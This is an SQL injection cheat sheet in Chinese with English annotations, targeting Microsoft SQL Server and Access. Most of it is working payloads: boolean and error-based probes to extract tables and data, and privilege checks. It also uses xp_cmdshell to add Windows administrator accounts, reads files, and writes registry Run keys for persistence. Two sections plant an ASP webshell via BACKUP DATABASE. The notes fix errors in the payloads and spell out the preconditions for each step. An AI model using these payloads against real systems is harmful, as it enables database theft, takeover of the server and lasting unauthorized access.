1. 判断是否有注入:  ;and 1=1   /   ;and 1=2
   Note: boolean-based check. The response to `and 1=1` should match the untampered request and the response to `and 1=2` should differ; a WAF block page or a generic error page answers both the same way and produces a false negative, so compare against the original response, not just between the two probes.

2. 初步判断是否是 mssql:  ;and user>0
   Note: `user` is an nvarchar on SQL Server, so comparing it with an int forces an implicit conversion of the current database user name and raises a "Conversion failed when converting the nvarchar value 'dbo' to data type int" style error. The error text both fingerprints SQL Server and leaks the user name, but only when the application echoes database errors; with errors suppressed this probe is blind and section 5 is the alternative.

3. 注入参数是字符型:  'and [查询条件] and ''='
   Note: the leading quote closes the original string literal; the trailing `''='` re-balances the quotes so the application's own closing quote turns the tail into `''=''` (true).

4. 搜索时没过滤参数的:  'and [查询条件] and '%25'='
   Note: `%25` URL-decodes to `%`, so inside a `LIKE '%...%'` search the tail becomes `'%'='%'` (true). Send it URL-encoded exactly as shown.
5. 判断数据库系统
;and (select count(*) from sysobjects)>0      -- mssql
;and (select count(*) from msysobjects)>0     -- access
   Note: `sysobjects` is a SQL Server system view (kept as a compatibility view from 2005 on), so the first probe is true on SQL Server and errors on Access. `MSysObjects` is a Jet/Access system table that default workgroup security does not let ordinary connections read, so on Access the second probe usually fails with a "no read permission on 'MSysObjects'" error rather than returning a count — that distinctive error message is itself the fingerprint. Run both probes: one alone cannot distinguish "wrong engine" from "query blocked".
6. 猜表名:  ;and (select count(*) from [表名])>0
7. 猜字段:  ;and (select count(字段名) from 表名)>0
8. 猜字段中记录长度:  ;and (select top 1 len(字段名) from 表名)>0
   Note: in the original text "数据库名" in 6–8 actually stands for a table name, not a database name — `select count(*) from X` succeeds only when X is a table or view the current user can read. `count(字段名)` counts non-NULL values, so a column that exists but is entirely NULL returns 0 and looks like a miss; `count(*)` with the column in a `where` clause avoids that. `top 1` without `order by` returns an arbitrary row, and `>0` is only the template: binary-search the length with `>1`, `>2`, ... (or `=n`), remembering that `len()` ignores trailing spaces.
9.(1) 猜字段的 ascii 值 (access)
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
  (2) 猜字段的 ascii 值 (mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
   Note: `asc()`/`mid()` are Jet (Access) functions and do not exist on SQL Server; there use `unicode()`/`substring()` as shown (`ascii()` also works but maps non-ASCII characters to `?`, which matters for Chinese data). The second argument of `mid`/`substring` is the 1-based character position — increment it to walk the value — and binary-search the code point (`>64`, `>96`, ...) instead of testing `>0`.
10. 测试权限结构 (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
   Note: IS_SRVROLEMEMBER returns 1 when the current login is in the fixed server role, 0 when it is not, and NULL when the role name is invalid — `1=NULL` is UNKNOWN, so a misspelt role reads as "not a member". IS_MEMBER('db_owner') is evaluated against the current database only. The trailing `--` comments out the remainder of the application's query, so these payloads fit only where nothing after the injection point is needed for the query to parse. Everything in sections 11–14 needs `sysadmin`; test that first and stop if it is 0.
11. 添加 mssql 和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,password,username;--
;exec master.dbo.sp_addsrvrolemember username,sysadmin;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
   Note: the original listing had the positional arguments reversed. `sp_password` takes (@old, @new, @loginame), so the new password comes before the login name; `sp_addsrvrolemember` takes (@loginame, @rolename), so the login comes before `sysadmin` (and the two arguments need a comma). These three procedures are deprecated from SQL Server 2005 on — use `CREATE LOGIN`, `ALTER LOGIN ... WITH PASSWORD`, `ALTER SERVER ROLE sysadmin ADD MEMBER` — and all of them require sysadmin. `xp_cmdshell` is disabled by default since SQL Server 2005 and has to be switched on through `sp_configure` (again sysadmin); the OS commands then run as the SQL Server service account, so `net localgroup administrators ... /add` succeeds only when that service account is itself a local administrator. The `net user` command was split across two lines in the original and must be sent as one string.
12.(1) 遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0
   Note: the last line read `>)` in the original; it must be `>0`. The `>0` comparison works by forcing a varchar-to-int conversion error that echoes the directory name, so this is error-based and needs visible database errors. `xp_dirtree 'c:\'` returns two columns (subdirectory, depth), matching the two columns of `dirs`; a directory name longer than 100 characters makes the `INSERT ... EXEC` fail with a truncation error, so widen `paths` if that happens. `top 1` without `order by` can hand back the same row twice — the growing `not in (...)` list is what forces progress. `dirs` is a permanent table created in the connection's current database: drop it when finished.
(2) 遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;--                        -- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--                -- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--           -- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   -- 查看文件的内容
   Note: the column lists match what each procedure returns — `xp_availablemedia` four columns (name, low free, high free, media type), `xp_subdirs` one, `xp_dirtree` two (subdirectory, depth), `xp_cmdshell` one row per output line; an `INSERT ... EXEC` whose column count does not match the result set fails. `temp` is an ordinary table, not a `#temp` table, created in whatever database the injected connection is using, so it persists and is visible to DBAs — drop it when done. `xp_availablemedia` and `xp_subdirs` are undocumented, `xp_cmdshell` is disabled by default, and all of them normally require sysadmin. Values are read back with the same `>0` conversion-error trick as in 12.(1).
13. mssql 中的存储过程
xp_regenumvalues 根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   -- 以多个记录集方式返回所有键值

xp_regread 根键, 子键, 键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   -- 返回指定键的值

xp_regwrite 根键, 子键, 值名, 值类型, 值
值类型有 2 种: REG_SZ 表示字符型, REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'   -- 写入注册表

xp_regdeletevalue 根键, 子键, 值名
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'   -- 删除某个值

xp_regdeletekey 根键, 子键
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'   -- 删除键, 包括该键下所有值
   Note: the xp_reg* procedures are undocumented extended procedures in `master`. They act with the privileges of the SQL Server service account, so what they can read or write under HKLM depends on that account; `xp_regwrite` and `xp_regdelete*` require sysadmin, and `xp_regread` has historically been callable by lower-privileged logins only for a limited set of keys. `xp_regread` returns the value as a result set, so inside an injection it is combined with `insert ... exec` into a table and read out as in section 12. Writing under `...\CurrentVersion\Run` (the key enumerated above) creates a logon-persistence entry, and `xp_regdeletekey` is recursive and irreversible — keep the harmless example names (`TestValueName`, `Testkey`) when practising.
14. mssql 的 backup 创建 webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
   Note: the empty string literal is the placeholder for the ASP script; the backup writes the database pages, including the `image` column's bytes, to the given path, and ASP treats everything outside `<% ... %>` as literal page content, so the binary material around the script is emitted rather than executed. Preconditions: the injected login is sysadmin (`USE` plus `BACKUP DATABASE` on the `model` system database); the path is on the database host, not the web server if they differ, inside a web-served directory the SQL Server service account can write to; and the web server still parses the oversized file. `model` is the template for every new database, so drop the `cmd` table afterwards or every database created from then on inherits it. In a single injected request the four statements must be stacked with `;` separators.
15. mssql 内置函数
;and (select @@version)>0        -- 获得 SQL Server 版本(字符串末尾带操作系统版本)
;and user_name()='dbo'           -- 判断当前连接用户在当前库中是否映射为 dbo
;and (select user_name())>0      -- 爆当前连接的数据库用户名
;and (select db_name())>0        -- 得到当前连接的数据库
   Note: the three `>0` forms rely on the nvarchar-to-int conversion error echoing the value, so they need visible database errors. `@@version` is the SQL Server build string; it ends with the Windows version, which is what the original "获得 Windows 的版本号" refers to. `user_name()='dbo'` does not prove the login is `sa`: every sysadmin login and the database owner map to `dbo`, and `sa` is often renamed or disabled. Use `IS_SRVROLEMEMBER('sysadmin')` from section 10 for the privilege question and `system_user` for the login name.
16. 简洁的 webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';
   Note: identical to section 14 except for the destination path. The same caveats apply — sysadmin rights, a path writable by the SQL Server service account on the database host, the `model` template database polluted with `cmd` until it is dropped, and the empty string standing in for the ASP script.